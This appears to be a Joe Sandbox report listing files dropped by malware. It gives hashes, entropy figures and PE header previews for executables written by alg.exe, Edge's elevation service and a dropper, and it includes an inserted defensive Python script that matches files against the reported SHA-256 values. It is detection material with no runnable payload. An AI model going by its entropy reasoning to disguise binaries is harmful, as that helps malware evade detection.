                                                                                                                                                SSDEEP:24576:DKI7Twj5KDHxJ1FxyD+/wsG18bbQpsqjnhMgeiCl7G0nehbGZpbD:Dv7e0j31mD+/wDGbODmg27RnWGj
                                                                                                                                                MD5:982EBD8B8FEB06B328EA7586DBCF26F9
                                                                                                                                                SHA1:D7D8DDD4B1933AA9F722408C3F4A9EE3BA1871C7
                                                                                                                                                SHA-256:9A8751B9E0E2F41AF1B19C0C08717C98B12E6F6E015A5CEC0A4A346658B76665
                                                                                                                                                SHA-512:9C175F5F3F90CA91C3C17448A95401FD3A7B7E5BB2B525C147D0F9E0C8F9CA02121C6C8E0C8FC280F8DB4C43D2FC54D974C919D62855174E1D98F7F17908190C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.....................................^.... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1378304
                                                                                                                                                Entropy (8bit):5.377446724572037
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:DQUVPDHhSWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:UyhSWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:9F1CC5EEBCC36742E89B7D16AB3CEE2E
                                                                                                                                                SHA1:7B5E4303DD20E26B1AF90D3109B852E71C29BE43
                                                                                                                                                SHA-256:7B7DBAA892C682A8CFA40106CC12E260D8AF00E491C20B481C4C1F439C0E55E8
                                                                                                                                                SHA-512:02E5003BAF4292D167338BBB58C8691802C29FC775E91B21BF1FC59BA6A04A6F1AE064D3CA94537012482E7CBFE6483700889B50390ECE2588A61AB0AD650305
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p......^..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1286656
                                                                                                                                                Entropy (8bit):7.222138928229475
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:MsFfc1VyFn5UQn652bO4HxsqjnhMgeiCl7G0nehbGZpbD:MsFcIn5rJTDmg27RnWGj
                                                                                                                                                MD5:4DB6C700F63003CE04146C2ED6BA037E
                                                                                                                                                SHA1:63821F6E7A6A59E7EC8EDA931DB659322D381547
                                                                                                                                                SHA-256:B80D9B5E324C50FCE7CB0ED19789D6D2CA1604D9D7BBF067F36F80AD31B9BDE3
                                                                                                                                                SHA-512:33A98BFBDBA4ED225A5B91AB18B3571FDDD25D143B981B6A8A68D018B7F74B7ADE977EB6FC7B1BF236BD766AFC2E0E1D02BE9CA25269F34B040E455A1A59F563
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@....................................{).... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1246208
                                                                                                                                                Entropy (8bit):7.494293942642746
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:xt9o6p4xQbiKI69wpemIwpel9ysqjnhMgeiCl7G0nehbGZpbD:xt9faQbtl2peapelMDmg27RnWGj
                                                                                                                                                MD5:CC3F19ED21EA52CFCC726F4A8093CC3D
                                                                                                                                                SHA1:A4D69E95AD0308B63B72EC9DE57F146DADB86F0D
                                                                                                                                                SHA-256:285627006524CC2F6BEF4956F4B1E9CB2D1DC7493B04480536097CF7273E9516
                                                                                                                                                SHA-512:8DAFFF2E6E085BCB9FD34DC35D9D48BC2276E4C4B7312006218B3B1AA21C67EE4BDB94AC34C87F508D64141D93D3EC492A8684A44BD29CEAA44C060913680895
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.....................................Y.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1356800
                                                                                                                                                Entropy (8bit):5.347852399510411
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:8QVTZu0JpsqjnhMgeiCl7G0nehbGZpbD:TVTZucDmg27RnWGj
                                                                                                                                                MD5:E005B0372AA3AAEF18DAF5F0C8C35597
                                                                                                                                                SHA1:2DA86045643ACCB96A36283B7E8BB85645716E01
                                                                                                                                                SHA-256:C30FF5F2839605834AA9F0D2C10313393EBF04F3081513C6883FEA214D60AACA
                                                                                                                                                SHA-512:C448D518570F090BB1560B9B7796FCD0D10082D060970D7C461EC5CCC4C08AE7E3AC269F6F2D37E897419340EBDC18971575C0CFE224AC67C98BEC7CDFA27B36
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1344000
                                                                                                                                                Entropy (8bit):6.808380259200985
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:KC1vpgXcZHz/sqjnhMgeiCl7G0nehbGZpbD:KC1vpIcNjDmg27RnWGj
                                                                                                                                                MD5:D5ECD04F55E40E8DF98357450DF31CBC
                                                                                                                                                SHA1:F599CB991A0DA895E12A51BC963B3AD11C592B48
                                                                                                                                                SHA-256:1B8914DD73A8B9CCFBC8F34C3EEC2946CBB1A30F14ADEE6E421E9FC3DD5A1A38
                                                                                                                                                SHA-512:62CDD2F43A554C705DC5FA33F513C406C33D14A89893A0156277B320C7FD0A8CE72C952074E824E9DB02E9515FD95652F64638D0936BECE7B1A6250B2C648228
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@....................................C..... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1200128
                                                                                                                                                Entropy (8bit):5.140036718079791
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:tSwj7Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tv7sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:FE12125D8E2C682EF63286BD73A646E9
                                                                                                                                                SHA1:91733E94E5F4B1544A7E7C08E27C8A41EEA9E95F
                                                                                                                                                SHA-256:1F148D0566B940E547931270309B94D46117B09657228860EA8BB0271DEA15B1
                                                                                                                                                SHA-512:2A89125BC04A43663AA0644C9E9E29A7C40341626827A9824AB467AB4259FDBD89A36F4426445A8B23B4F726573C0CC389700565442D4E88E6C9C2D598DC4959
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@..................................... .... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1408512
                                                                                                                                                Entropy (8bit):5.441172758363981
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:KWKntIfGpZsqjnhMgeiCl7G0nehbGZpbD:98Ie7Dmg27RnWGj
                                                                                                                                                MD5:968FF8506CFCCD72BEC21E50A56F27E5
                                                                                                                                                SHA1:85FC79A3B534494ACDE52DE37E3F4CA70CDDA4A3
                                                                                                                                                SHA-256:532711A3C4D25E3606C2A5EDAFEC0B4C4D237FF50F8928007350FB011CE91E2A
                                                                                                                                                SHA-512:C7CD6FC8BCD3A2A2E99D3E9F537D5B07718A7F99C3F77D0DFAC90BC899FDADA5517F268010A0A12445421F6379660D31D3706F00FBFDD10B6BD7E5833863D3E9
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@....................................Wa.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1185280
                                                                                                                                                Entropy (8bit):5.103277382949175
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:oIhHXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ZHsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:D0ECC6B51550FF9659D2CCD839CBD13E
                                                                                                                                                SHA1:C5E656432721BE11B5609EF0C2DCD47DF013EE1C
                                                                                                                                                SHA-256:60E1A20585869D056DA31347DF6B7905BF3449DCAA24158C84B43A84406AEB2A
                                                                                                                                                SHA-512:FB2E6D2CBDC24521EBEED4B151F00D9FE7A055ECA86D83CF168F1B4DDCAF7FCFAA375C67771DE79A3B137C2A93FBA7FBB9F0AE590E57D46ED070CF4D8B6D3217
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................9j.... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1531904
                                                                                                                                                Entropy (8bit):5.421214630800603
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:c8oREwt2ioQ3J+RisqjnhMgeiCl7G0nehbGZpbD:c8oRpoFmDmg27RnWGj
                                                                                                                                                MD5:374B18BE5020C65A518AA12AC475CA3E
                                                                                                                                                SHA1:C187ACC644AFA906083F36284781CE08A6A7F291
                                                                                                                                                SHA-256:40FC3E48F272B87859BBDA83630CA97D86B360A6D115C7117916C9216C52F90F
                                                                                                                                                SHA-512:F2FDA897DF0221FE37B277CCF508FA67911CFF51E737B607A34A6BC7736B9B4570C566E629290B1975E7CB4B48CF5050C1A0523C4B4A34C3480DF78F19A3805B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@.......................................... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................
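The records above all carry the same field set: the four digests (MD5, SHA1, SHA-256, SHA-512), the file size, and an "Entropy (8bit)" value, which is the Shannon entropy of the byte distribution in bits per byte (0.0 for constant data, 8.0 for uniformly random bytes). The SSDEEP field is a fuzzy hash that needs the ssdeep library and is not recomputed here. Every file in this stretch was written by C:\Windows\System32\alg.exe, and what an analyst wants from such a list is a way to recompute the fields on a file pulled from a host, match it against the report's hashes, and look at entropy per PE section rather than for the whole file, since a patched or appended section stands out against the low-entropy code of the original binary. The script below is an added example written for this page, not Joe Sandbox code; the SHA-256 set is copied from the ten complete alg.exe records above, and the sample PE it builds is a constructed stand-in, not one of the report's files.

```python
"""Recompute Joe Sandbox dropped-file fields and check a PE against the report's hashes."""
import hashlib
import math
import struct
import sys
from collections import Counter

# SHA-256 values copied from the dropped-file records above (files written by alg.exe).
REPORT_SHA256 = {
    "9A8751B9E0E2F41AF1B19C0C08717C98B12E6F6E015A5CEC0A4A346658B76665",
    "7B7DBAA892C682A8CFA40106CC12E260D8AF00E491C20B481C4C1F439C0E55E8",
    "B80D9B5E324C50FCE7CB0ED19789D6D2CA1604D9D7BBF067F36F80AD31B9BDE3",
    "285627006524CC2F6BEF4956F4B1E9CB2D1DC7493B04480536097CF7273E9516",
    "C30FF5F2839605834AA9F0D2C10313393EBF04F3081513C6883FEA214D60AACA",
    "1B8914DD73A8B9CCFBC8F34C3EEC2946CBB1A30F14ADEE6E421E9FC3DD5A1A38",
    "1F148D0566B940E547931270309B94D46117B09657228860EA8BB0271DEA15B1",
    "532711A3C4D25E3606C2A5EDAFEC0B4C4D237FF50F8928007350FB011CE91E2A",
    "60E1A20585869D056DA31347DF6B7905BF3449DCAA24158C84B43A84406AEB2A",
    "40FC3E48F272B87859BBDA83630CA97D86B360A6D115C7117916C9216C52F90F",
}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: the report's 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def hashes(data: bytes) -> dict:
    """The four digests a record lists, upper-cased the way the report prints them."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def pe_sections(data: bytes) -> list:
    """Walk the PE section table and return (name, raw_offset, raw_size, entropy) per section.

    Works for PE32 and PE32+: the table starts at COFF header + SizeOfOptionalHeader,
    so the optional header's own layout does not need to be parsed.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        hdr = table + 40 * i
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("latin-1")
        raw_size, raw_ptr = struct.unpack_from("<II", data, hdr + 16)  # SizeOfRawData, PointerToRawData
        body = data[raw_ptr:raw_ptr + raw_size]
        sections.append((name, raw_ptr, raw_size, round(shannon_entropy(body), 3)))
    return sections


def triage(data: bytes) -> dict:
    """Recompute a record's fields and flag the file if its SHA-256 appears in the report."""
    digests = hashes(data)
    return {
        "Size (bytes)": len(data),
        "Entropy (8bit)": round(shannon_entropy(data), 6),
        "known_bad": digests["SHA-256"] in REPORT_SHA256,
        "sections": pe_sections(data),
        **digests,
    }


def build_sample_pe() -> bytes:
    """Constructed PE32+ stand-in (not one of the report's files): a low-entropy .text
    section followed by a high-entropy blob, so the per-section view has a contrast to show."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 240, 0x22)     # x86-64, two sections
    opt = struct.pack("<H", 0x20B) + b"\0" * 238                        # PE32+ magic, rest zeroed
    text_body = b"\x90" * 400 + b"\xC3" * 112                           # NOPs and RETs: low entropy
    blob_body = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(16))  # 512 high-entropy bytes

    def section(name, vaddr, raw_ptr, body):
        return struct.pack("<8sIIIIIIHHI", name, len(body), vaddr, len(body), raw_ptr, 0, 0, 0, 0, 0x60000020)

    headers = dos + b"PE\0\0" + coff + opt
    headers += section(b".text", 0x1000, 0x200, text_body)
    headers += section(b".blob", 0x2000, 0x400, blob_body)
    headers += b"\0" * (0x200 - len(headers))                           # pad to first section's raw offset
    return headers + text_body + blob_body


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, value in triage(data).items():
        print(f"{key}: {value}")
```

Run it with a file path to check a suspect binary against the report's hashes, or with no argument to see the constructed sample: the .text section comes out near 0.76 bits per byte while the appended blob sits above 7, and the whole-file figure lands in between, which is why a single file-level entropy such as the 5.1 to 7.5 range in these records says less than the per-section breakdown. A hit in REPORT_SHA256 is an exact match only; a recompiled or re-infected copy of the same binary will miss it, so treat a miss as "not this exact file", not as clean.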
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1341952
                                                                                                                                                Entropy (8bit):5.238587484657839
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:/f8HQlDMxHwJ07w8sqjnhMgeiCl7G0nehbGZpbD:/kHQlqwJ0DDmg27RnWGj
                                                                                                                                                MD5:670DFE734C28EDD64354C0AF67C27A12
                                                                                                                                                SHA1:79605C24E6075BEB169C7EA3FC40895616688D01
                                                                                                                                                SHA-256:CAC3823F22A8012565DB607C6E2D107AA81EAD4627A41AC95EF563439236A648
                                                                                                                                                SHA-512:3D9082EEE0650FC7F944AE1E1AEDCC952A69A143BBBC1A5A0DE44614A6EE50CCA35C8BCEBFF477F0C33763800DCFC7C4B56E768C79480FA8FE973318492171D8
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@.......................................... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...P.......@...:..............@...................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):197382
                                                                                                                                                Entropy (8bit):7.978975431817648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:+SOKoJPTB79RI/WXs8zXMxVa19sGTd+tVLpOHy8fPYWFfQY:+SboJPVp+uXsRxgPFuppO1PYWFoY
                                                                                                                                                MD5:66E2BD1E26E599FFB38600216BC3854B
                                                                                                                                                SHA1:7909678F09AA823A8A6479C402979E808115C71C
                                                                                                                                                SHA-256:A120388AE974719B7876271E7C8EA30A9040C101C3EB67F085A6F7EAF0747D89
                                                                                                                                                SHA-512:DCAF815478E1759490921C3CF4BAAA6EA46819E6219FC62E3E1AC057DA6BAA8F7210F9BEC671F9EB36E489D2254968FD687F81041CE60D8AD8621EF29C6C2C12
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:EA06..8..D95..N.8.T(S]..Y.... ...J..j......}Z...L.M.^J_...Esw(uBW#.Qg.Y..o>.V.s.ejwj.....}Z.9.EapXU.w<.Wm..|.....U......r{.aF.Hu...M'.....?N.d...4h...7......WK....K...o..#.9............1.EhSX...Y.}.V..Mm.w..&.K...U..[.[.0..p...xx(`..d.3.*.....8...u....B...5..R.Z.P..).>..H..*..&(.%..Q.....c*..f.Z.......0.O..^.N @....9t.....'..&..._.X... .`...|7j.j.l.I...X.A>.....)..M.<.[..q-..T6....[.....j.........SJ........3.N(T......;....K.x.g.........e...fujFj.B..t..f.......-....er...[..c.8<6W+..W..:...1._4..jkB.Qv....M....c....l.8.....Fx...g.+..|.).&..<$s.Uv...mc5o.....T...*..."SZ..{..}.s......}+. .....{u..%...5;.]w.Z.*A^.W.\}....S.[:...f.U(@...C..S..;u&.........C .N...P.Mo..V.!..F)6=~..n.....O...:.5...Y...U...U.u..7..di8...YZ.p.4..;.Y..#...^..r..j.O...]*3I.>-.....|..S..0}N..:.wf.IM.,.."...Z...R.....YQ..y.k.*.&.q..K.{....hSZ.;a6..aT..n.S..hU......k=...!...=..k#^...k...Z..o.....Yq..?.If..9{.0..A.F...~.M.........u.....v.+UV.Y.J....cD..wj ...'A.u..3.
                                                                                                                                                Process:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):197382
                                                                                                                                                Entropy (8bit):7.978975431817648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:+SOKoJPTB79RI/WXs8zXMxVa19sGTd+tVLpOHy8fPYWFfQY:+SboJPVp+uXsRxgPFuppO1PYWFoY
                                                                                                                                                MD5:66E2BD1E26E599FFB38600216BC3854B
                                                                                                                                                SHA1:7909678F09AA823A8A6479C402979E808115C71C
                                                                                                                                                SHA-256:A120388AE974719B7876271E7C8EA30A9040C101C3EB67F085A6F7EAF0747D89
                                                                                                                                                SHA-512:DCAF815478E1759490921C3CF4BAAA6EA46819E6219FC62E3E1AC057DA6BAA8F7210F9BEC671F9EB36E489D2254968FD687F81041CE60D8AD8621EF29C6C2C12
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:EA06..8..D95..N.8.T(S]..Y.... ...J..j......}Z...L.M.^J_...Esw(uBW#.Qg.Y..o>.V.s.ejwj.....}Z.9.EapXU.w<.Wm..|.....U......r{.aF.Hu...M'.....?N.d...4h...7......WK....K...o..#.9............1.EhSX...Y.}.V..Mm.w..&.K...U..[.[.0..p...xx(`..d.3.*.....8...u....B...5..R.Z.P..).>..H..*..&(.%..Q.....c*..f.Z.......0.O..^.N @....9t.....'..&..._.X... .`...|7j.j.l.I...X.A>.....)..M.<.[..q-..T6....[.....j.........SJ........3.N(T......;....K.x.g.........e...fujFj.B..t..f.......-....er...[..c.8<6W+..W..:...1._4..jkB.Qv....M....c....l.8.....Fx...g.+..|.).&..<$s.Uv...mc5o.....T...*..."SZ..{..}.s......}+. .....{u..%...5;.]w.Z.*A^.W.\}....S.[:...f.U(@...C..S..;u&.........C .N...P.Mo..V.!..F)6=~..n.....O...:.5...Y...U...U.u..7..di8...YZ.p.4..;.Y..#...^..r..j.O...]*3I.>-.....|..S..0}N..:.wf.IM.,.."...Z...R.....YQ..y.k.*.&.q..K.{....hSZ.;a6..aT..n.S..hU......k=...!...=..k#^...k...Z..o.....Yq..?.If..9{.0..A.F...~.M.........u.....v.+UV.Y.J....cD..wj ...'A.u..3.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):197382
                                                                                                                                                Entropy (8bit):7.978975431817648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:+SOKoJPTB79RI/WXs8zXMxVa19sGTd+tVLpOHy8fPYWFfQY:+SboJPVp+uXsRxgPFuppO1PYWFoY
                                                                                                                                                MD5:66E2BD1E26E599FFB38600216BC3854B
                                                                                                                                                SHA1:7909678F09AA823A8A6479C402979E808115C71C
                                                                                                                                                SHA-256:A120388AE974719B7876271E7C8EA30A9040C101C3EB67F085A6F7EAF0747D89
                                                                                                                                                SHA-512:DCAF815478E1759490921C3CF4BAAA6EA46819E6219FC62E3E1AC057DA6BAA8F7210F9BEC671F9EB36E489D2254968FD687F81041CE60D8AD8621EF29C6C2C12
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:EA06..8..D95..N.8.T(S]..Y.... ...J..j......}Z...L.M.^J_...Esw(uBW#.Qg.Y..o>.V.s.ejwj.....}Z.9.EapXU.w<.Wm..|.....U......r{.aF.Hu...M'.....?N.d...4h...7......WK....K...o..#.9............1.EhSX...Y.}.V..Mm.w..&.K...U..[.[.0..p...xx(`..d.3.*.....8...u....B...5..R.Z.P..).>..H..*..&(.%..Q.....c*..f.Z.......0.O..^.N @....9t.....'..&..._.X... .`...|7j.j.l.I...X.A>.....)..M.<.[..q-..T6....[.....j.........SJ........3.N(T......;....K.x.g.........e...fujFj.B..t..f.......-....er...[..c.8<6W+..W..:...1._4..jkB.Qv....M....c....l.8.....Fx...g.+..|.).&..<$s.Uv...mc5o.....T...*..."SZ..{..}.s......}+. .....{u..%...5;.]w.Z.*A^.W.\}....S.[:...f.U(@...C..S..;u&.........C .N...P.Mo..V.!..F)6=~..n.....O...:.5...Y...U...U.u..7..di8...YZ.p.4..;.Y..#...^..r..j.O...]*3I.>-.....|..S..0}N..:.wf.IM.,.."...Z...R.....YQ..y.k.*.&.q..K.{....hSZ.;a6..aT..n.S..hU......k=...!...=..k#^...k...Z..o.....Yq..?.If..9{.0..A.F...~.M.........u.....v.+UV.Y.J....cD..wj ...'A.u..3.
                                                                                                                                                Process:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):197382
                                                                                                                                                Entropy (8bit):7.978975431817648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:+SOKoJPTB79RI/WXs8zXMxVa19sGTd+tVLpOHy8fPYWFfQY:+SboJPVp+uXsRxgPFuppO1PYWFoY
                                                                                                                                                MD5:66E2BD1E26E599FFB38600216BC3854B
                                                                                                                                                SHA1:7909678F09AA823A8A6479C402979E808115C71C
                                                                                                                                                SHA-256:A120388AE974719B7876271E7C8EA30A9040C101C3EB67F085A6F7EAF0747D89
                                                                                                                                                SHA-512:DCAF815478E1759490921C3CF4BAAA6EA46819E6219FC62E3E1AC057DA6BAA8F7210F9BEC671F9EB36E489D2254968FD687F81041CE60D8AD8621EF29C6C2C12
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
